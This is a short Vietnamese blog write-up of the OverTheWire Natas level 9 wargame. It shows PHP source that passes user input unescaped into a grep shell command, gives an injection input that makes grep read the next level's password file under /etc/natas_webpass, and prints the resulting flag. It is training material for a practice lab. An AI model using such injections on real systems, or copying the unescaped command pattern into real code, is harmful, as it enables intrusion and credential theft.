[OverTheWire] Natas – Level 09

http://natas9.natas.labs.overthewire.org/

Find words containing…

Nhấn View sourcecode:

<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>

$key = "";

if(array_key_exists("needle", $_REQUEST)) {

$key = $_REQUEST["needle"];

}

if($key != "") {

passthru("grep -i $key dictionary.txt");

}

Cú pháp lệnh grep có thể tham khảo tại:

http://www.gnu.org/savannah-checkouts/gnu/grep/manual/grep.html

Thông tin được cung cấp từ đầu:

Each level has access to the password of the next level. Your job is to somehow obtain that next password and level up. All passwords are also stored in /etc/natas_webpass/. E.g. the password for natas5 is stored in the file /etc/natas_webpass/natas5 and only readable by natas4 and natas5.

Do biến $key không bị escape, ta có thể inject bằng input sau:

'' /etc/natas_webpass/natas10;

Kết quả:

nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

→ flag = nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu.

Yêu CTF

CTF chưa bao giờ khiến tôi mệt mỏi…

[OverTheWire] Natas – Level 09

Leave a Reply Cancel reply